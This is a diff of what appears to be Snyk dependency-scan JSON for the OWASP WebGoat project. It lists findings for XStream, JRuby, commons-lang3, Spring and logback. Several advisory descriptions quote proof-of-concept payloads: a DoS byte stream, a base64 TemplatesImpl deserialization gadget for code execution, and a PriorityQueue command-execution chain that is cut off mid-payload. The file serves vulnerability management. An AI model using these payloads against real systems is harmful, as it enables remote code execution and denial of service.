+                  "url": "https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 98 } },
           "title": "Denial of Service (DoS)"
         },
-        "id": "0000005c-0000-4000-8000-00000000005c",
+        "id": "00000000-0000-0000-0000-000000000040",
         "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.1.6"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.0.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000005c-0000-4000-8000-00000000005c",
-              "type": "fixes"
-            }
-          }
-        },
+        "relationships": {},
         "type": "findings"
       },
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.jruby:jruby](https://www.jruby.org) is a high performance, stable, fully threaded Java implementation of the Ruby programming language.\n\nAffected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch in the SSL certificate validation process. An attacker can intercept secure communications by presenting a valid certificate for an unrelated domain that the attacker controls.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the attacker is in a \"man-in-the-middle\" (MITM) position before performing the attack.\n## PoC\n```\r\nrequire \"net/http\"\r\nrequire \"openssl\"\r\n\r\nuri   = URI(\"https://bad.substitutealert.com/\")\r\nhttps = Net::HTTP.new(uri.host, uri.port)\r\nhttps.use_ssl      = true\r\nhttps.verify_mode  = OpenSSL::SSL::VERIFY_PEER\r\n\r\nbody = https.start { https.get(uri.request_uri).body }\r\nputs body\r\n```\n## Remediation\nUpgrade `org.jruby:jruby` to version 9.4.12.1, 10.0.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/jruby/jruby-openssl/commit/b1fc5d645c0d90891b8865925ac1c15e3f15a055)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the `BinaryStreamDriver`.\n\n## Workaround\n\nThis vulnerability can be mitigated by catching the `StackOverflowError` in the client code calling XStream.\n## PoC\nPrepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:\n\n```java\nfinal byte[] byteArray = new byte[36000];\nfor (int i = 0; i \u003c byteArray.length / 4; i++) {\n      byteArray[i * 4] = 10;\n      byteArray[i * 4 + 1] = -127;\n      byteArray[i * 4 + 2] = 0;\n      byteArray[i * 4 + 3] = 0;\n}\n\nXStream xstream = new XStream(new BinaryStreamDriver());\nxstream.fromXML(new ByteArrayInputStream(byteArray));\n```\n\nAs soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.21 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a)\n- [XStream Advisory](https://x-stream.github.io/CVE-2024-47072.html)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.asciidoctor:asciidoctorj",
-                  "version": "2.5.10"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.jruby:jruby",
-                  "version": "9.4.3.0"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000005d-0000-4000-8000-00000000005d",
+          "key": "00000000-0000-0000-0000-000000000041",
           "locations": [
             {
               "package": {
-                "name": "org.jruby:jruby",
-                "version": "9.4.3.0"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 132
-            }
-          },
-          "title": "Improper Validation of Certificate with Host Mismatch"
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.21)"],
+              "created_at": "2024-11-08T07:53:13.375269Z",
+              "credits": ["Alexis Challande"],
+              "cvss_base_score": 8.7,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.7,
+                  "cvss_version": "4.0",
+                  "modified_at": "2024-11-08T07:53:13.677692Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-11-08T07:53:13.677692Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-11-09T13:32:23.362333Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-11-20T11:01:43.397333Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
+              "disclosed_at": "2024-11-07T21:51:17Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.39481",
+                "probability": "0.00176"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924",
+              "initially_fixed_in_versions": ["1.4.21"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-11-20T11:01:43.397333Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2024-11-08T07:53:13.624529Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2024-47072.html"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-hfq9-hggm-c56q", "source": "ghsa" },
+            { "id": "CVE-2024-47072", "source": "cve" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 194 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "0000005d-0000-4000-8000-00000000005d",
+        "id": "00000000-0000-0000-0000-000000000041",
         "links": {},
         "relationships": {
           "fix": {
@@ -17006,21 +6933,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.jruby:jruby",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.asciidoctor:asciidoctorj",
-                          "version": "3.0.1"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.jruby:jruby",
-                          "version": "9.4.14.0"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.21"
                         }
                       ],
                       "is_drop": false
@@ -17029,7 +6952,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000005d-0000-4000-8000-00000000005d",
+              "id": "00000000-0000-0000-0000-000000000041",
               "type": "fixes"
             }
           }
@@ -17039,46 +6962,142 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion via the `ClassUtils.getClass` function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.\n## Remediation\nUpgrade `org.apache.commons:commons-lang3` to version 3.18.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1)\n- [GitHub Commit](https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003cdynamic-proxy\u003e\r\n    \u003cinterface\u003emap\u003c/interface\u003e\r\n    \u003chandler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'\u003e\r\n\t  \u003cclassToInvocationHandler class='linked-hash-map'/\u003e\r\n      \u003cdefaultHandler class='sun.tracing.NullProvider'\u003e\r\n        \u003cactive\u003etrue\u003c/active\u003e\r\n        \u003cproviderType\u003ejava.lang.Object\u003c/providerType\u003e\r\n        \u003cprobes\u003e\r\n          \u003centry\u003e\r\n            \u003cmethod\u003e\r\n              \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n              \u003cname\u003ehashCode\u003c/name\u003e\r\n              \u003cparameter-types/\u003e\r\n            \u003c/method\u003e\r\n            \u003csun.tracing.dtrace.DTraceProbe\u003e\r\n              \u003cproxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/\u003e\r\n                \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n                  \u003cdefault\u003e\r\n                    \u003c__name\u003ePwnr\u003c/__name\u003e\r\n                    \u003c__bytecodes\u003e\r\n                      \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=\u003c/byte-array\u003e\r\n                      \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n                    \u003c/__bytecodes\u003e\r\n                    \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n                    \u003c__indentNumber\u003e0\u003c/__indentNumber\u003e\r\n                  \u003c/default\u003e\r\n                \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n              \u003c/proxy\u003e\r\n              \u003cimplementing__method\u003e\r\n                \u003cclass\u003ecom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003c/class\u003e\r\n                \u003cname\u003egetOutputProperties\u003c/name\u003e\r\n                \u003cparameter-types/\u003e\r\n              \u003c/implementing__method\u003e\r\n            \u003c/sun.tracing.dtrace.DTraceProbe\u003e\r\n          \u003c/entry\u003e\r",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.apache.commons:commons-lang3",
-                  "version": "3.12.0"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000005e-0000-4000-8000-00000000005e",
+          "key": "00000000-0000-0000-0000-000000000042",
           "locations": [
             {
               "package": {
-                "name": "org.apache.commons:commons-lang3",
-                "version": "3.12.0"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 172
+          "problems": [
+            { "id": "CWE-434", "source": "cwe" },
+            { "id": "GHSA-3ccq-5vw3-2p6x", "source": "ghsa" },
+            { "id": "CVE-2021-39149", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:35:50.612195Z",
+              "credits": ["Lai Han"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:22.805549Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.428032Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:47.63548Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.240881Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:34:18Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.71511",
+                "probability": "0.00712"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:47.63548Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:24.090306Z",
+              "references": [
+                {
+                  "title": "GitHub Advisory",
+                  "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39149.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Uncontrolled Recursion"
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000005e-0000-4000-8000-00000000005e",
+        "id": "00000000-0000-0000-0000-000000000042",
         "links": {},
         "relationships": {
           "fix": {
@@ -17086,17 +7105,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.apache.commons:commons-lang3",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.apache.commons:commons-lang3",
-                          "version": "3.18.0"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -17105,7 +7124,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000005e-0000-4000-8000-00000000005e",
+              "id": "00000000-0000-0000-0000-000000000042",
               "type": "fixes"
             }
           }
@@ -17115,54 +7134,216 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via HTTP requests, when both of these conditions are true:\r\n\r\n- Spring MVC or Spring WebFlux is in use.\r\n\r\n- `org.springframework.boot:spring-boot-actuator` is on the classpath.\r\n\r\n## Workaround\r\n\r\nThis vulnerability can be avoided by disabling web metrics: `management.metrics.enable.http.server.requests=false`\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework.boot:spring-boot-actuator` to version 2.7.18, 3.0.13, 3.1.6 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-boot/commit/5490e73922b37a7f0bdde43eb318cb1038b45d60)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-34055)\n",
+          "description": "Dual license: EPL-1.0, LGPL-2.1",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter-validation",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter",
+                  "version": "3.5.6"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-actuator",
-                  "version": "3.1.5"
+                  "name": "org.springframework.boot:spring-boot-starter-logging",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "ch.qos.logback:logback-classic",
+                  "version": "1.5.18"
                 },
+                { "name": "ch.qos.logback:logback-core", "version": "1.5.18" }
+              ],
+              "source": "dependency_path"
+            }
+          ],
+          "finding_type": "sca",
+          "key": "00000000-0000-0000-0000-000000000043",
+          "locations": [
+            {
+              "package": {
+                "name": "ch.qos.logback:logback-core",
+                "version": "1.5.18"
+              },
+              "type": "package"
+            }
+          ],
+          "policy_modifications": [],
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[0.9.18,)"],
+              "created_at": "2025-03-09T16:21:02.569Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "id": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
+              "instructions": [],
+              "license": "(EPL-1.0 OR LGPL-2.1)",
+              "package_name": "ch.qos.logback:logback-core",
+              "package_version": "",
+              "published_at": "2025-03-09T16:21:02.569Z",
+              "severity": "medium",
+              "source": "snyk_license"
+            }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": {},
+          "title": "Dual license: EPL-1.0, LGPL-2.1"
+        },
+        "id": "00000000-0000-0000-0000-000000000043",
+        "links": {},
+        "relationships": {},
+        "type": "findings"
+      },
+      {
+        "attributes": {
+          "cause_of_failure": false,
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003c!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: --\u003e\r\n\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n        \u003cm__obj class='string'\u003ecom.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: \u003cnone\u003e\u003c/m__obj\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n        \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n          \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n          \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n          \u003cbodyParts/\u003e\r\n          \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n            \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n            \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n              \u003csoapPart/\u003e\r\n              \u003cmm\u003e\r\n                \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                  \u003caliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'\u003e\r\n                    